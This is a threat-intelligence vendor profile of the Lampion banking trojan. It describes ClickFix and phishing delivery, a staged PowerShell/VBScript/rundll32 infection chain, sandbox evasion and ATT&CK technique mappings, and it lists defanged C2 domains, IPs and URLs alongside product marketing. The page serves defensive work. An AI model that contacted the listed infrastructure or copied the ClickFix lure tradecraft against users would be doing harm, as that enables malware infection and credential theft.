Malware

Lampion

Lampion is a banking trojan and infostealer focused on sensitive banking information. The content states it has been active since at least 2019 and has been heavily associated with Portuguese-language and Portuguese-targeted campaigns, including activity against organizations in government, finance, and transportation. It has also been described as known to target Latin American users, and Cofense notes Lampion Banking Trojan was almost exclusively observed in Portuguese-language campaigns.

Observed delivery vectors include phishing emails with ZIP attachments, HTML files inside archives, SEO poisoning, compromised websites, and ClickFix-style social engineering. In the documented 2025 campaigns, victims were redirected to fake Portuguese tax authority-themed pages and tricked into copying and executing malicious PowerShell commands via the Windows Run dialog under the guise of fixing a problem or enabling file preview.

The infection chain described by Microsoft and Unit 42 is multi-stage and heavily obfuscated. PowerShell downloads obfuscated VBScript/VBS stages; execution is split across non-consecutive processes and hidden scheduled tasks to hinder detection and process-tree correlation. Later stages perform reconnaissance and evasion, including WMI checks for security products and sandbox/VM detection, gather endpoint data, generate a victim identifier, communicate with cloud-hosted C2 infrastructure, and use rundll32.exe to launch a large DLL loader. Unit 42 reported stage-3 scripts of roughly 30-50 MB with junk code and a stage-4 DLL loader exceeding 700 MB. In the observed campaign, the final Lampion payload was not actually delivered because the payload download command was commented out.

Unit 42 attributed a focused campaign against dozens of Portuguese organizations to Lampion operators based on shared infrastructure, including reuse of a C2 server used in prior Lampion infections. Microsoft reported the campaign was active in May-June 2025 and later expanded beyond Portugal to organizations in Switzerland, Luxembourg, France, Hungary, and Mexico across government, education, transportation, and financial services sectors.

High-confidence infrastructure and IOC details mentioned in the content include domains autoridade-tributaria[.]com and inde-faturas[.]com, C2 IPs 5.8.9[.]77 and 83.242.96[.]159, and cloud-hosted URLs such as http://18.116.63[.]61/ifeellike.php and http://3.135.249[.]199/prayfor.php.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

MITRE ATT&CK

Techniques & procedures

18 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique

T1608.006SEO PoisoningEvidence1

A combined 35% of social engineering cases involved less conventional methods, including SEO poisoning and malvertising, smishing and MFA bombing.

Initial Access

2 techniques

T1189Drive-by CompromiseEvidence1

One example is ClickFix, a technique using fake browser alerts, fraudulent update prompts and drive-by downloads to initiate compromise.

T1566PhishingEvidence2

Phishing accounted for 23% of all intrusions and that number remains constant for the data set used in this report. When isolating only social engineering-driven intrusions, phishing rises to 65% of those cases.

Execution

5 techniques

T1053.005Scheduled TaskEvidence1

The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.

T1059.001PowerShellEvidence1

The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs)... PowerShell continues to be the most leveraged native binary, with cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) being very prolific.

T1059.003Windows Command ShellEvidence1

The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart. After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.

T1059.005Visual BasicEvidence1

The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs). The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.

T1204User ExecutionEvidence1

The ClickFix technique attempts to trick users into running malicious commands on their devices... It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell.

Persistence

2 techniques

T1053.005Scheduled TaskEvidence1

The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.

T1547.001Registry Run Keys / Startup FolderEvidence1

The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.

Privilege Escalation

2 techniques

T1053.005Scheduled TaskEvidence1

The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.

T1547.001Registry Run Keys / Startup FolderEvidence1

The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.

Stealth

4 techniques

T1027Obfuscated Files or InformationEvidence1

Threat actors obfuscate the JavaScript that generates the visual lures or they download parts of the code from different servers. They also employ various tactics in obfuscating malicious commands... These techniques include nested execution chains, proxy command abuse, encoding schemes such as Base64, use of string concatenation/fragmentation, and escaped characters.

T1218System Binary Proxy ExecutionEvidence1

“Final payloads are often ‘fileless’… launched in memory by living-off-the-land binaries (LOLBins)… code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe… signs pointing to LOLBins—such as powershell, mshta, rundll32, wscript…”

T1218.011Rundll32Evidence1

After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.

T1497Virtualization/Sandbox EvasionEvidence1

This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.

Discovery

2 techniques

T1082System Information DiscoveryEvidence1

This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance... and sends system data to a command-and-control (C2) server.

T1497Virtualization/Sandbox EvasionEvidence1

Command and Control

3 techniques

T1071Application Layer ProtocolEvidence2

The infrastructure commonly supports ransomware command and control (C2) servers, malware distribution, phishing campaigns, botnet management, and data exfiltration staging.

T1071.001Web ProtocolsEvidence1

T1105Ingress Tool TransferEvidence2

CTU researchers investigated the potential scale of malicious use of these devices and identified multiple internet-exposed systems associated with cybercriminal activity, including ransomware operations and commodity malware delivery.

Exfiltration

1 technique

T1041Exfiltration Over C2 ChannelEvidence1

These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.

INDICATORS OF COMPROMISE

IOCs tracked for this family

6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other

1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

ip.v4●●●●●●●●●●●●View more in app10 months ago

uri●●●●●●●●●●●●View more in app6 years ago

ACTIVITY FEED

Recent activity

10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

10 SOURCESView more in app

the hacker newsNews

Feb 10, 2026

Reynolds Ransomware Embeds BYOVD Driver to Disable EDR Security Tools

Malware family referenced as part of campaigns leveraging the same/similar infrastructure.

sophos threat researchNews

Feb 9, 2026

Malicious use of virtual machine infrastructure | SOPHOS

Infostealer listed in observed malicious activity associated with ISPsystem-derived infrastructure.

the hacker newsNews

Nov 3, 2025

⚡ Weekly Recap: Lazarus Hits Web3, Intel/AMD TEEs Cracked, Dark Web Leak Tool & More

Banking trojan and stealer targeting credentials and financial information, distributed via phishing lures and ZIP attachments, with recent enhancements for persistence.

microsoft security blogNews

Aug 21, 2025

Think before you Click(Fix): Analyzing the ClickFix social engineering technique | Microsoft Security Blog

A banking-focused infostealer delivered through a multi-stage ClickFix infection chain using obfuscated VBScript, reconnaissance, sandbox checks, persistence, and attempted DLL execution.

+6 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching6

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping18

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.